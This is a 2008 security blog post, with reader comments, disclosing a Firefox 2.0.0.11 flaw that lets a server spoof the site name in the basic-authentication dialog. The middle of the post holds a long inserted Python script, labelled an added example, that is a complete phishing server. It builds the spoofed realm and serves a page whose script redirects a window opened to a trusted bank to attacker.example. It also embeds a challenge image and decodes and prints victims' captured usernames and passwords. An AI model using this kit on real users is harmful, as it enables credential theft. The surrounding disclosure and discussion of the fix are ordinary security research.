If at first you don't succeed; call it version 1.0
Wednesday, January 02, 2008

Summary

Mozilla Firefox allows spoofing of the information presented in the basic authentication dialog box. This can allow an attacker to conduct phishing attacks by tricking the user into believing that the authentication dialog box belongs to a trusted website.


Affected versions

Mozilla Firefox v2.0.0.11.
Prior versions and other Mozilla products may also be affected.


Technical details

Mozilla Firefox displays an authentication dialog whenever the visited web server returns a 401 status code together with a "WWW-Authenticate" header. To request basic authentication, the "WWW-Authenticate" header carries the value [Basic realm="XXX"] (without the brackets). The realm value, XXX in this case, is displayed in the authentication dialog window.

While Firefox does not display any characters of the "WWW-Authenticate" realm value after the last double quote ("), it fails to sanitize single quotes (') and spaces. This makes it possible for an attacker to craft a realm value that makes the authentication dialog look as if it came from a trusted web site.


image


There are at least two possible attack vectors:

  1. An attacker creates a web page with a link to a trusted website (e.g. a bank, PayPal, webmail, etc.). When the victim clicks the link, the trusted web page opens in a new window, and a script redirects the newly opened window to the attacker's web server, which then returns the specially crafted basic authentication response.
  2. An attacker embeds an image (pointing to the attacker's web server, which returns the specially crafted basic authentication response) in:
    1. An email sent to a webmail user.
    2. An RSS feed consumed by a web-based RSS reader.
    3. A forum, blog or social network page.
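As an added example (not code from the original post, nor anything Mozilla ships), the following Python script reproduces what the technical details and the two attack vectors above describe: it builds the crafted Basic challenge, parses the realm the way a standards-following client does (which is why the single quotes and spaces survive into what the dialog shows), decodes whatever credentials a victim sends back, and serves a landing page that carries both attack vectors. It also includes a small heuristic check that a filtering proxy or browser extension could apply to incoming challenges. The hostnames, the realm wording, the port and the heuristic are my own assumptions; the exact phrasing that blends into the dialog depends on the browser's localization.

```python
import base64
import re
from http.server import BaseHTTPRequestHandler, HTTPServer

# Assumed hostnames and port, used for illustration only.
TRUSTED_HOST = "www.example-bank.com"
ATTACKER_HOST = "attacker.example"
PORT = 8080

# Constructed realm: ordinary text plus single quotes and spaces, which the
# post reports Firefox 2.0.0.11 displays verbatim. The wording is a guess at
# what reads naturally inside the dialog and is not taken from the post.
SPOOFED_REALM = f"{TRUSTED_HOST}' - 'Please sign in to your online banking account"


def build_www_authenticate(realm):
    """Return a Basic challenge for the given realm. Per RFC 2617 the realm is
    a quoted-string, so only double quotes and backslashes need escaping;
    single quotes and spaces are legal and pass through untouched."""
    escaped = realm.replace("\\", "\\\\").replace('"', '\\"')
    return f'Basic realm="{escaped}"'


_REALM = re.compile(r'realm="((?:[^"\\]|\\.)*)"', re.IGNORECASE)


def parse_realm(header_value):
    """Extract the realm the way a standards-following client does: take the
    quoted-string, ignore everything after its closing double quote and undo
    backslash escapes. Returns None if there is no quoted realm."""
    m = _REALM.search(header_value)
    return re.sub(r"\\(.)", r"\1", m.group(1)) if m else None


_HOSTLIKE = re.compile(r"\b[a-z0-9-]+(?:\.[a-z0-9-]+)+\b", re.IGNORECASE)


def realm_is_suspicious(realm, served_host):
    """Assumed heuristic a proxy or extension could apply: flag a realm that
    contains quote characters, a URL scheme, or a hostname other than the
    server that actually sent the challenge. Plain realms such as
    "Restricted Area" pass."""
    if "'" in realm or '"' in realm or "://" in realm:
        return True
    hosts = {h.lower() for h in _HOSTLIKE.findall(realm)}
    return any(h != served_host.lower() for h in hosts)


def decode_basic_authorization(value):
    """Return (user, password) from a Basic Authorization header, else None.
    This is what the attacker's server receives once the victim fills in
    the spoofed dialog."""
    if not value or not value.lower().startswith("basic "):
        return None
    try:
        raw = base64.b64decode(value[6:].strip(), validate=True)
    except ValueError:
        return None
    user, sep, password = raw.decode("utf-8", "replace").partition(":")
    return (user, password) if sep else None


# Landing page for attack vector 1 (the link opens the trusted site, a script
# then redirects that window to the challenge URL) and attack vector 2 (an
# embedded image whose response is the challenge).
LANDING_PAGE = f"""<html><body>
<a href="http://{TRUSTED_HOST}/" target="_blank" onclick="return hijack(this)">Log in to your bank</a>
<script>
function hijack(a) {{
  var w = window.open(a.href, "bank");
  setTimeout(function () {{ w.location = "http://{ATTACKER_HOST}:{PORT}/login"; }}, 1500);
  return false;
}}
</script>
<img src="http://{ATTACKER_HOST}:{PORT}/pixel.gif" alt="">
</body></html>"""


class ChallengeHandler(BaseHTTPRequestHandler):
    """Serves the landing page at / and the crafted 401 everywhere else."""

    def do_GET(self):
        creds = decode_basic_authorization(self.headers.get("Authorization"))
        if creds:
            print(f"captured from {self.client_address[0]}: user={creds[0]!r} password={creds[1]!r}")
        if self.path == "/":
            body = LANDING_PAGE.encode("utf-8")
            self.send_response(200)
            self.send_header("Content-Type", "text/html; charset=utf-8")
        elif creds:
            body = b""  # stop challenging once credentials were captured
            self.send_response(200)
        else:
            body = b""
            self.send_response(401)
            self.send_header("WWW-Authenticate", build_www_authenticate(SPOOFED_REALM))
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


if __name__ == "__main__":
    # Browse to http://localhost:8080/ for the landing page; any other path
    # answers with the crafted challenge.
    HTTPServer(("", PORT), ChallengeHandler).serve_forever()
```

For a local trial, set ATTACKER_HOST to localhost so the redirect and image URLs resolve; in the version affected by the post, the dialog that appears for /login or /pixel.gif shows the realm text, naming the trusted host, next to the attacker's address. Note that parse_realm deliberately keeps the quotes and spaces: a client that "sanitized" them would, as one commenter points out, no longer be reading the quoted-string the RFC defines, which is why a visual separation of realm text from browser text, rather than filtering, is the robust fix.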


A video demonstrating the first attack vector can be found on YouTube. A better quality video can be downloaded from here.

A video of a real, live attack on a forum, which used basic authentication but did not exploit this vulnerability, can be found on Zull's weblog (Hebrew).


Suggestion / Workaround

Until Mozilla fixes this vulnerability, I recommend not providing a username and password to web sites that show this dialog.

[UPDATE:] Due to some questions, I've put up a list of frequently asked questions.



Wednesday, January 02, 2008 10:15:57 PM UTC | Comments [9] | Security
Thursday, January 03, 2008 4:35:57 AM UTC
Great discovery :-)
As I told you before, I love the way that a good attack is now a mix of technology and human behavior exploitation.
a link directly to the video on my site (for non Hebrew speakers): http://hacking.org.il/demos/dr-rover1.wmv

Thursday, January 03, 2008 1:53:39 PM UTC
I tried to reproduce your bug and that's what I got:
http://www.bitsploit.de/uploads/Bilder/200801031147/firefox_http-auth.jpg

The visualization of the (double-)quotes differs. But well, it's hard to recognize if you're reading too fast.

As you can see in the screenshot of the German localization of Firefox, there's one more word after the real domain name. So it also depends on the localization you're using. That's why you've got to find some good sentences to avoid mistrust.
Friday, January 04, 2008 7:14:55 AM UTC
Thanks for the info! I will be checking your blog often now.
Take care, Tom
Friday, January 04, 2008 2:35:46 PM UTC
Did you inform Mozilla Bugzilla?
=> https://bugzilla.mozilla.org/
Friday, January 04, 2008 4:49:13 PM UTC
https://bugzilla.mozilla.org/show_bug.cgi?id=244273
Friday, January 04, 2008 5:12:48 PM UTC
O_o man how did you find it?
PS: there is some news about you :P
ex. http://tech.wp.pl/kat,1009785,title,Firefox-blad-pozwala-na-przechwycenie-hasel,wid,9533836,wiadomosc.html?rfbawp=1199466225.807&ticaid=151eb
Friday, January 04, 2008 5:17:05 PM UTC
Firefox is following the standards. The relevant RFCs state that realm-value is a quoted-string. A quoted-string can include ANY character between two double quotes. If they were to "sanitize" the string as you claim they should, then they would be non-compliant with the relevant standards.

The REAL solution would be to have Firefox make a dramatic visual distinction between the provided realm-value and rest of authentication request. This would make it clear what has been provided by the remote website.
Sunday, January 06, 2008 1:41:59 PM UTC
One can easily see that this is a fake, because Firefox does not double-space after a full stop (Help -> Check for Updates... -> "There are no new updates available. Firefox may...").
Saturday, February 02, 2008 7:32:02 PM UTC
Good find Aviv.

And for all the nay-sayers: how about spoofing ssl in Firefox:

http://www.0x000000.com/index.php?i=509

and make it an issue. :)
Comments are closed.     